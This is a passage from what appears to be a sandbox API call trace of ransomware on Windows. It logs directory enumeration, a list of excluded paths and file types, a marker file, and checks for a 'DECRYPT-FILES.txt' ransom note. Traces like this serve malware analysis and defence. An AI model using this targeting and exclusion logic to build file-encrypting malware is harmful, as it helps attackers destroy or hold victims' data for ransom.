HALPmcxz\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0185.795] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\Program Files") returned 0x0 [0185.795] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch=":\\Windows") returned 0x0 [0185.795] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\Games\\") returned 0x0 [0185.795] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.795] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.795] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.796] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.796] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.796] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\All Users") returned 0x0 [0185.796] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.796] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.796] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.796] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="AhnLab") returned 0x0 [0185.796] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.796] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 36 [0185.796] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.796] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\\\0a16c9.tmp") returned 47 [0185.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0185.796] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 36 [0185.796] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.796] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\\\DECRYPT-FILES.txt") returned 54 [0185.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.796] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 36 [0185.796] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*" [0185.796] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf17306a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf17306a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0185.797] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.797] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf17306a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf17306a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.797] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.797] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.797] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf17306a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf17306a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf17306a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.797] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.797] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.797] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.797] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.797] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.797] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.797] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.797] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.797] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.797] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.797] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.797] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.797] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.797] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.797] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.797] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 36 [0185.797] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.797] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0185.797] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\0a16c9.tmp" [0185.797] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.798] CloseHandle (hObject=0x0) returned 0 [0185.798] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.798] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefec200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaefec200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaefec200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.798] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.798] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0185.798] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0185.798] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0185.798] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0185.798] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0185.798] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0185.798] lstrcmpiW (lpString1="Desktop.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0185.798] lstrcmpiW (lpString1="Desktop.lnk", lpString2="autorun.inf") returned 1 [0185.798] lstrcmpiW (lpString1="Desktop.lnk", lpString2="boot.ini") returned 1 [0185.798] lstrcmpiW (lpString1="Desktop.lnk", lpString2="desktop.ini") returned 1 [0185.798] lstrcmpiW (lpString1="Desktop.lnk", lpString2="ntuser.dat") returned -1 [0185.798] lstrcmpiW (lpString1="Desktop.lnk", lpString2="iconcache.db") returned -1 [0185.798] lstrcmpiW (lpString1="Desktop.lnk", lpString2="bootsect.bak") returned 1 [0185.798] lstrcmpiW (lpString1="Desktop.lnk", lpString2="ntuser.dat.log") returned -1 [0185.798] lstrcmpiW (lpString1="Desktop.lnk", lpString2="thumbs.db") returned -1 [0185.798] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Bootfont.bin") returned 1 [0185.798] lstrlenW (lpString="Desktop.lnk") returned 11 [0185.798] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0185.798] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0185.798] lstrcmpiW (lpString1="Downloads.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0185.798] lstrcmpiW (lpString1="Downloads.lnk", lpString2="autorun.inf") returned 1 [0185.798] lstrcmpiW (lpString1="Downloads.lnk", lpString2="boot.ini") returned 1 [0185.798] lstrcmpiW (lpString1="Downloads.lnk", lpString2="desktop.ini") returned 1 [0185.798] lstrcmpiW (lpString1="Downloads.lnk", lpString2="ntuser.dat") returned -1 [0185.798] lstrcmpiW (lpString1="Downloads.lnk", lpString2="iconcache.db") returned -1 [0185.798] lstrcmpiW (lpString1="Downloads.lnk", lpString2="bootsect.bak") returned 1 [0185.799] lstrcmpiW (lpString1="Downloads.lnk", lpString2="ntuser.dat.log") returned -1 [0185.799] lstrcmpiW (lpString1="Downloads.lnk", lpString2="thumbs.db") returned -1 [0185.799] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Bootfont.bin") returned 1 [0185.799] lstrlenW (lpString="Downloads.lnk") returned 13 [0185.799] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0185.799] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0185.799] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0185.799] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="autorun.inf") returned 1 [0185.799] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="boot.ini") returned 1 [0185.799] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="desktop.ini") returned 1 [0185.799] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="ntuser.dat") returned 1 [0185.799] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="iconcache.db") returned 1 [0185.799] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="bootsect.bak") returned 1 [0185.799] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="ntuser.dat.log") returned 1 [0185.799] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="thumbs.db") returned -1 [0185.799] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Bootfont.bin") returned 1 [0185.799] lstrlenW (lpString="RecentPlaces.lnk") returned 16 [0185.799] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0185.799] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0185.799] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0185.799] CloseHandle (hObject=0x254) returned 1 [0185.799] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0185.799] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0185.799] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0185.799] lstrcatW (in: lpString1="Local Settings", lpString2="\\" | out: lpString1="Local Settings\\") returned="Local Settings\\" [0185.799] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Local Settings\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" [0185.799] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\Program Files") returned 0x0 [0185.799] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch=":\\Windows") returned 0x0 [0185.799] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\Games\\") returned 0x0 [0185.799] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.799] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.799] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.799] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\All Users") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\Local Settings\\") returned="\\Local Settings\\" [0185.800] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaf37e300, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf37e300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0185.800] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0185.800] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0185.800] lstrcatW (in: lpString1="Music", lpString2="\\" | out: lpString1="Music\\") returned="Music\\" [0185.800] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\Program Files") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch=":\\Windows") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\Games\\") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\All Users") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="AhnLab") returned 0x0 [0185.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.800] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0185.800] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.800] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\\\0a16c9.tmp") returned 47 [0185.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0185.800] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0185.800] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.801] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\\\DECRYPT-FILES.txt") returned 54 [0185.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.801] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0185.801] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" [0185.801] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf17306a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf17306a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0185.801] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.801] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf17306a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf17306a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.801] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.801] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.801] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf12217e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf17306a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf17306a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.801] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.801] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.801] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.801] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.801] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.801] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0185.801] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.801] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0185.801] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0a16c9.tmp" [0185.801] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.802] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.802] CloseHandle (hObject=0x0) returned 0 [0185.802] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.802] FindNextFileW 